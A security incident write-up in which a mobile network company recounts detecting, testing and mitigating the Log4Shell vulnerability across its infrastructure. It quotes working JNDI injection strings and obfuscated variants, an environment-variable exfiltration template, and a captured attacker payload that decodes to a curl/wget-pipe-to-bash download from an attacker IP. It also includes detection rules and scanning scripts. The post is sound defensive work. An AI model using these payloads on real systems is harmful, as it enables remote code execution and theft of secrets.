Managing zero-day vulnerabilities in a Mobile Core Platform - Log4j CVE-2021-44228

By Jonnathan Griffin - Security Engineer, Yan Grunenberger - Software Engineer, 2021-12-17

Learn how Working Group Two managed to mitigate a zero-day vulnerability across a global cloud-based mobile network.


Table of Contents

Friday

Saturday

Monday

What worked well and could be improved
Staying secure
We are hiring

Friday

On Friday, December 10th, Working Group Two, like many others, became aware of a critical-severity zero-day vulnerability in the Log4j library, CVE-2021-44228, known as “Log4Shell”. Log4j is widely used in numerous systems around the internet. We immediately opened a security incident and have been actively taking steps to mitigate and monitor the situation.

Mitigating 3rd party vulnerabilities is an ability that Working Group Two has prepared for. The first step in doing so is to assess the impact of the Log4j library across our microservice architecture.

We knew that all Log4j versions from 2.0-beta9 through 2.14.1 were affected.
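As an illustration of that range, here is a minimal Python sketch that checks whether a Log4j 2 version string falls between 2.0-beta9 and 2.14.1. The function names and the ordering of pre-release qualifiers (alpha, then beta, then rc, then the final release) are assumptions made for this example; this is not code we ran during the incident.

```python
import re

# Assumed ordering of pre-release qualifiers; a final release sorts last.
_QUALIFIER_RANK = {"alpha": 0, "beta": 1, "rc": 2, "": 3}


def version_key(version: str) -> tuple:
    """Turn a version such as '2.0-beta9' or '2.14.1' into a sortable tuple."""
    match = re.fullmatch(
        r"(\d+(?:\.\d+)*)(?:-(alpha|beta|rc)(\d+))?", version.strip().lower()
    )
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    numbers = [int(part) for part in match.group(1).split(".")]
    numbers += [0] * (3 - len(numbers))  # pad '2.0' to (2, 0, 0)
    qualifier = match.group(2) or ""
    qualifier_number = int(match.group(3) or 0)
    return (*numbers[:3], _QUALIFIER_RANK[qualifier], qualifier_number)


_FIRST_AFFECTED = version_key("2.0-beta9")
_LAST_AFFECTED = version_key("2.14.1")


def is_affected(version: str) -> bool:
    """True if the version lies in the range affected by CVE-2021-44228."""
    return _FIRST_AFFECTED <= version_key(version) <= _LAST_AFFECTED
```

For example, `is_affected("2.10.0")` is true while `is_affected("2.15.0")` is false.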

Code

Naturally, the first place to look was our codebase, to answer the question: do we have Java microservices using Log4j? Our core application code lives in a monorepo, which makes this easier as there is only one place to look. In addition, we use Bazel, which helps with managing dependencies. After a quick scan through our repo, we found that a vulnerable version of Log4j was declared as a dependency but was not used by any service. We cleaned this up and removed Log4j entirely.
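A scan like this can be approximated with a few lines of Python. The sketch below walks a checkout and reports every Maven-style coordinate of the form `org.apache.logging.log4j:<artifact>:<version>`. It assumes dependencies are declared as such coordinate strings somewhere in the tree, which may not match how a given repository declares them; the function name is hypothetical.

```python
import os
import re
from pathlib import Path

# Maven-style coordinate, e.g. org.apache.logging.log4j:log4j-core:2.14.1
_COORDINATE = re.compile(r"org\.apache\.logging\.log4j:(log4j-[\w-]+):([\w.\-]+)")


def find_log4j_coordinates(root):
    """Return (file, line number, artifact, version) for each Log4j coordinate."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = Path(dirpath) / name
            try:
                text = path.read_text(encoding="utf-8", errors="ignore")
            except OSError:
                continue  # unreadable file, skip it
            for lineno, line in enumerate(text.splitlines(), start=1):
                for match in _COORDINATE.finditer(line):
                    hits.append((str(path), lineno, match.group(1), match.group(2)))
    return hits
```

A text search like this only finds direct declarations. Transitive dependencies and third-party images need a different approach, which is why the container scans described later still matter.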

Docker Vulnerability Scan Day 1

We use Trivy as our Docker vulnerability scanner. We have integrated this scanner as part of our docker image registry.

On a first pass, all scans were negative across our infrastructure and we thought we were in the clear. We later identified that this was a false negative: Trivy’s database is only updated every 6 hours, and it did not include CVE-2021-44228 until around 48 hours after the vulnerability was first identified.

Saturday

Checking our infrastructure ourselves with DNS requests

At that point, we also wanted to evaluate for ourselves whether we were vulnerable. Early reports of Log4j exploitation showed that attackers were abusing the User-Agent field on public endpoints, such as HTTP endpoints. Requests to those endpoints are often logged in the Apache format, which exposes the user agent and the URL in the logs. In turn, those logs could be post-processed by a component using Log4j.

One harmless way to detect the vulnerability is to exercise the JNDI resolver, that is to say, to have Log4j perform a DNS request for the host that would serve the Java object. Thinkst provides a free tier of its Canarytokens service, which includes a DNS token.

If a DNS resolution is performed on the token's unique hostname, we get a callback or an email. After generating the token, we quickly proceeded to probe our infrastructure:

curl https://docs.wgtwo.com  -A "\${jndi:ldap://randomlygeneratedhostname.canarytokens.com/a}"

Shortly after executing the command, we received the notification from Canarytokens. This meant that one element of our infrastructure stack was relying on Log4j. We still needed to assess whether the vulnerability was exploitable, so we checked the infosec literature.

JNDI stands for Java Naming and Directory Interface. It is a system designed to look up data and resources, such as Java bytecode. It might sound wrong to engineers in 2021, but back in 2000, Java RMI, CORBA and the like were very trendy concepts for discovering and executing code dynamically; think of JavaScript or ActiveX applets in the browser world.

Going back to our problem, we quickly found Rogue JNDI. This is essentially an exploit generator that creates a fake LDAP server, replying with Java class objects that Log4j executes on object retrieval. After building a quick Docker image, we ran this exploit on an external host and executed several calls to check all the proposed payload types.

In particular, RemoteReference did not yield any execution, which probably means that the JVM running the affected Java component is either too recent or not configured to execute code via known remote methods. This gave us some time, but we were still exposed to information leakage, as an attacker can still exfiltrate environment variables via DNS queries: Log4j resolves environment variables and embeds them in a query, such as:

${jndi:ldap://${env:JAVA_VERSION}.dnsresolver.foo}
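To make the leak concrete, here is a toy Python model of that nested substitution. It is not Log4j's implementation. It only mimics the single step in which an inner `${env:NAME}` lookup is replaced by the variable's value before the outer JNDI lookup resolves the resulting hostname. The function name and the sample value are hypothetical.

```python
import re

# Matches an inner ${env:NAME} lookup.
_ENV_LOOKUP = re.compile(r"\$\{env:([A-Za-z_][A-Za-z0-9_]*)\}")


def expand_env_lookups(template: str, env: dict) -> str:
    """Replace each ${env:NAME} with its value; unknown names are left as-is."""
    return _ENV_LOOKUP.sub(lambda m: env.get(m.group(1), m.group(0)), template)


payload = "${jndi:ldap://${env:JAVA_VERSION}.dnsresolver.foo}"
# With a hypothetical JAVA_VERSION of 11.0.13, the value ends up in the hostname
# that would be resolved, and therefore in the attacker's DNS logs.
expanded = expand_env_lookups(payload, {"JAVA_VERSION": "11.0.13"})
```

Any secret stored in an environment variable of the affected process could be exfiltrated the same way, even when remote code execution itself fails.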

Next, we needed to: 1) identify whether the affected components were in our stack or in the cloud provider's, and 2) apply a mitigation.

For (1), we started to observe all our logging components and ran network monitoring for a specific TCP flow on a controlled external host (i.e. running tcpdump for a specific IP/port). We quickly noticed that a pod from one of our DaemonSets was the culprit. This component embedded Logstash, which runs on Java and uses Log4j.

Assuming this was the only affected element, we proceeded to apply a mitigation, weighing three options. We discarded the WAF approach as too complex and not providing enough coverage; indeed, we later saw obfuscated variants of the jndi:ldap string used to trigger the vulnerability. The environment variable / JVM options were the quickest to deploy, but had no effect; the Elastic page dedicated to the Log4j CVE later mentioned that this mitigation was ineffective. Java class removal consists of removing the vulnerable Java class from the classpath so that the component can no longer resolve resources dynamically. Because we use Docker images, we could simply alter the build recipe to perform the removal and redeploy the image. Within a couple of minutes, we could deploy the new Logstash component.
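The class-removal mitigation can be sketched in Python as follows. This assumes the class in question is `JndiLookup`, as in the widely published mitigation for this CVE, and that it sits directly inside a log4j-core JAR. The function name is hypothetical, and nested or shaded JARs would need extra handling. It illustrates the idea and is not the build step we used.

```python
import shutil
import tempfile
import zipfile
from pathlib import Path

# Path of the JNDI lookup class inside a log4j-core JAR (assumed target).
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def strip_jndi_lookup(jar_path) -> bool:
    """Rewrite the JAR without JndiLookup.class. Returns True if it was removed."""
    jar_path = Path(jar_path)
    removed = False
    # Write the filtered copy next to the original, then swap it into place.
    with tempfile.NamedTemporaryFile(
        dir=jar_path.parent, suffix=".jar", delete=False
    ) as tmp:
        tmp_path = Path(tmp.name)
    with zipfile.ZipFile(jar_path) as src, zipfile.ZipFile(
        tmp_path, "w", zipfile.ZIP_DEFLATED
    ) as dst:
        for item in src.infolist():
            if item.filename == JNDI_LOOKUP_CLASS:
                removed = True
                continue  # drop the vulnerable class
            dst.writestr(item, src.read(item.filename))
    if removed:
        shutil.move(str(tmp_path), str(jar_path))
    else:
        tmp_path.unlink()  # nothing to change, discard the copy
    return removed
```

Running such a step in the image build means every redeployed container ships without the class, independent of JVM flags or environment variables.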

Log Analysis and Alerting

Just after the zero-day was released, we identified an indicator of compromise (IoC) within our logs that is helpful for security forensics: the string “${jndi”.

Cloudflare wrote a great blog post about the traffic they have seen when updating their firewall rules for preventing Log4j exploits.

We wanted to achieve something similar and ensure that we could monitor malicious actors probing our public infrastructure. We have centralized logging that acts as our Security Information and Event Management (SIEM) solution. It is based on Elasticsearch, which, by the way, was another service we needed to patch because of Log4j, as identified in the AWS Security Bulletin.

To get ChatOps alerts in Slack, we use an open-source tool called ElastAlert. This tool provides the ability to actively monitor and alert based on data within Elasticsearch. We use it for audit and security alerts within our applications and infrastructure.

To get started, we built the following ElastAlert rule:

log4j.yaml: |-
  ---
  name: "log4j cve"
  index: logstash-*
  type: any
  realert:
    minutes: 15
  filter:
  - query:
    - query_string:
        query: "\"jndi:ldap\""
  query_delay:
    minutes: 5
  query_key: "message"
  alert_text_type: alert_text_only
  include : ["kubernetes.container.name","message"]
  alert:
  - "slack"
  alert_text: "
  *Container* : {0}\n
  *Message* : {1}"
  alert_text_args: ["kubernetes.container.name","message"]
  slack_channel_override: "#cve-2021-44228"
  slack_emoji_override: ":unlock:"
  slack_msg_color: warning
  slack_title: Security RCE attempt for CVE-2021-44228

We then quickly began to receive alerts of probing attempts across our environments.

The following alerts are unsuccessful exploit attempts against our infrastructure.

Let’s take a closer look at some of these exploit attempts to see if we can learn anything.

[2021-12-10T14:05:52.612 Z] "GET / HTTP/1.1" 307 - 0 0 0 - "45.155.205.233" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0Myl8YmFzaA==}" "34b61b2d-28f6-4e89-9baf-7cd3b4e71698" "54.217.173.83:443" "-"

This request hit our public API gateway with a Base64-encoded payload. Decoding this payload shows what the actor was trying to accomplish:

base64

KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0M3x8d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0Myl8YmFzaA==

base64 decoded

(curl -s 45.155.205.233:5874/54.217.173.83:443||wget -q -O- 45.155.205.233:5874/54.217.173.83:443)|bash
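The decoding step is easy to script when triaging many alerts. The following Python sketch pulls the segment after `/Base64/` out of a log line and decodes it. The function name is ours, and the `/Base64/` path convention is assumed from the request shown above; other exploit kits may encode their payloads differently.

```python
import base64
import re

# The payload follows a "/Base64/" path segment in the JNDI URL.
_B64_SEGMENT = re.compile(r"/Base64/([A-Za-z0-9+/=]+)")


def decode_command(log_line: str):
    """Return the decoded command embedded in a JNDI URL, or None if absent."""
    match = _B64_SEGMENT.search(log_line)
    if match is None:
        return None
    return base64.b64decode(match.group(1)).decode("utf-8", errors="replace")


sample = (
    "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/"
    "KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0M3x8"
    "d2dldCAtcSAtTy0gNDUuMTU1LjIwNS4yMzM6NTg3NC81NC4yMTcuMTczLjgzOjQ0"
    "Myl8YmFzaA==}"
)
command = decode_command(sample)
```

The decoded string is only inspected here and never executed.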

Had this attack been successful, the actor would have attempted to download a malicious payload, first with curl and then, as a fallback, with wget, and then executed the downloaded payload with bash. We would also have received an alert from Falco, our host-based intrusion detection system (HIDS). In addition, this shows the importance of ensuring that our images are distroless, without bash and OS dependencies, and of blocking egress network traffic where possible, as either would also prevent such an attack.

Looking at more attempts, we started to see probes using a third-party service, Interactsh.

[16/Dec/2021:06:11:07 +0000] "GET /?x=${jndi:ldap://${hostName}.c6s8ou15g22ssten8u8gcg7po6oyo6dj6.interactsh.com/a} HTTP/1.1" 302 0 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6s8ou15g22ssten8u8gcg7po6oyo6dj6.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6s8ou15g22ssten8u8gcg7po6oyo6dj6.interactsh.com}" 685 0.015 [products-developer-portal-8080] 100.98.133.224:8080 0 0.014 302 548d1132926fa0bc9904e12523d2f250 [${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6s8ou15g22ssten8u8gcg7po6oyo6dj6.interactsh.com}, 173.249.19.100]

We saw many requests that use a DNS callback as a mechanism to detect whether a system is vulnerable.
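Requests like the one above also show why matching the literal string jndi:ldap is not enough: the lookup name is split across `${lower:...}` and `${::-...}` wrappers. As a minimal sketch, the Python below URL-decodes a log line, repeatedly unwraps those wrappers, and then checks for `${jndi:`. The function names are hypothetical, and the list of wrappers is deliberately short. Other obfuscations exist (for instance lookups with default values), so treat this as an illustration and not as a complete detector.

```python
import re
from urllib.parse import unquote

# ${lower:x}, ${upper:x} and ${::-x} all resolve to the text x (modulo case).
_WRAPPER = re.compile(r"\$\{(?:lower:|upper:|::-)([^${}]*)\}", re.IGNORECASE)


def normalize(text: str) -> str:
    """URL-decode the text and unwrap simple lookup wrappers until stable."""
    text = unquote(text)
    previous = None
    while previous != text:
        previous = text
        text = _WRAPPER.sub(r"\1", text)
    return text


def looks_like_log4shell_probe(text: str) -> bool:
    """True if the normalized text contains a JNDI lookup."""
    return "${jndi:" in normalize(text).lower()
```

Applied to the user-agent and referer fields of the Interactsh request, both obfuscated variants normalize to a plain `${jndi:ldap://...}` string and are flagged.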

[2021-12-14T22:57:36.722Z] "GET / HTTP/1.1" 307 - 0 0 0 - "51.105.55.17" "/${jndi:ldap://45.83.193.150:1389/Exploit}" "7c9223d6-2c81-491d-8564-10742cc90a9c" "54.75.196.220" "-"

In our Tokyo region, we started to see a lot of requests referencing the x00.it domain.

[14/Dec/2021:17:37:59 +0000] "GET /?id=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-0c1679670abeeb68eeabd98981713eea_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_id.log4jdns.x00.it%2F%7D&page=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-0c1679670abeeb68eeabd98981713eea_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_page.log4jdns.x00.it%2F%7D&search=%24%7Bjndi%3Aldap%3A%2F%2Fdivd-0c1679670abeeb68eeabd98981713eea_%24%7Bdate%3AYYYYMMddHHmmss%7D_https_search.log4jdns.x00.it%2F%7D HTTP/1.1" 401 39 "${jndi:ldap://divd-0c1679670abeeb68eeabd98981713eea_${date:YYYYMMddHHmmss}_https_Referer.log4jdns.x00.it/}" "${jndi:ldap://divd-0c1679670abeeb68eeabd98981713eea_${date:YYYYMMddHHmmss}_https_User-Agent.log4jdns.x00.it/}" 4496 0.255 [monitoring-mki-lab-grafana-80] 100.115.164.63:3000 39 0.001 401 d7fa702ee8cc73793707ca6720c57639 [194.5.73.6]

In the coming weeks we will continue to monitor the probes across our public infrastructure to see how they evolve.

Monday

Docker Vulnerability Scans

Next, we wanted to ensure that no application running in our Kubernetes clusters used a vulnerable version of Log4j. We know from this resource that many open-source applications are vulnerable. To ensure we were not running a vulnerable tool, we used the Kubernetes API via kubectl together with Trivy, a scanner for vulnerabilities in container images.

First, we built a small POC to ensure that Trivy could identify CVE-2021-44228.

❯❯❯ brew install aquasecurity/trivy/trivy
❯❯❯ trivy image birdyman/log4j2-demo:1.0.0-12 | grep CVE-2021-44228 
| org.apache.logging.log4j:log4j-api                     | CVE-2021-44228   | CRITICAL | 2.10.0            | 2.15.0                         | Remote code injection in Log4j                                                  |

Now that we know Trivy works, let’s create a small bash script that calls kubectl and Trivy and greps for the Log4j CVE.

trivy-scan-cve.sh CVE-2021-44228

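#!/usr/bin/env bash
# Scan every container image running in the current cluster for a given CVE.

# The CVE identifier is required as the first argument.
VULN="${1:?usage: $0 <CVE-ID>}"

echo "Scanning for ${VULN}..."

# Collect the unique set of container images across all namespaces.
imgs=$(kubectl get pods -A -o jsonpath='{.items[*].spec.containers[*].image}' | tr -s '[:space:]' '\n' | sort -u)
for img in ${imgs}; do
  echo "scanning ${img}"
  # Only CRITICAL findings are listed, which includes CVE-2021-44228.
  result=$(trivy image --severity CRITICAL "${img}")
  if echo "${result}" | grep -q "${VULN}"; then
    echo "${img} is vulnerable, please patch!"
  fi
done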
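One limitation of the script above is that it only reads `.spec.containers`, so images used exclusively by init containers are not scanned. As a hedged sketch of how the image list could be widened, the Python function below takes the parsed output of `kubectl get pods -A -o json` and returns the unique images from both `containers` and `initContainers`. The function name is hypothetical and this was not part of our original tooling.

```python
def unique_images(pod_list: dict) -> list:
    """Return the sorted, de-duplicated images used by all pods in the list."""
    images = set()
    for pod in pod_list.get("items", []):
        spec = pod.get("spec", {})
        # Cover init containers as well as regular containers.
        for field in ("initContainers", "containers"):
            for container in spec.get(field) or []:
                image = container.get("image")
                if image:
                    images.add(image)
    return sorted(images)
```

The input can be obtained by loading the kubectl JSON output with `json.load`, and each returned image can then be passed to `trivy image` as in the script.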

We ran the above script across all of our Kubernetes clusters. This was helpful, as we found some additional test services that included the vulnerable Log4j library. These services were based on 3rd party open-source applications, so we had not been able to identify them earlier when looking only through our code dependencies. We took the necessary actions to remediate these services and verified that there had been no malicious traffic from these pods.

Monitoring Vendors

It is important to note that because we operate in the cloud and also use some vendor components in our mobile core network, we needed to ensure these core components were not affected by Log4j vulnerabilities. In our case, we followed the AWS and Cisco Security Bulletins and updated our components when required.

What worked well and could be improved

While managing this incident, we learned a number of valuable lessons.

First of all, our GitOps workflow and centralized software repositories were critical to remediating the vulnerability quickly. They enabled us to deploy new components across our entire infrastructure without interrupting operations or losing any log information in the process.

Second, while our monorepo and automated scans helped us a lot in identifying vulnerable components, they still depend on the availability of up-to-date information. During the incident, we noticed that it was often difficult to rely on those 3rd party components to address a zero-day risk. Therefore, we will improve our defense in depth by verifying that unnecessary code execution is systematically disabled in our runtimes, and improve the hygiene of our container images by adopting cloud industry best practices.

Staying secure

All in all, it is important that we have the ability to plan, identify, contain and prevent zero-day vulnerabilities such as Log4j. We only spoke about some of the controls we have in place, but we are continuing to explore new technologies and mechanisms to ensure we build and maintain a secure environment.

We are hiring

If you are a Security Engineer looking for a new challenge to make a secure mobile core platform, come and say hi. https://wgtwo.jobs.personio.de/job/423396?display=en
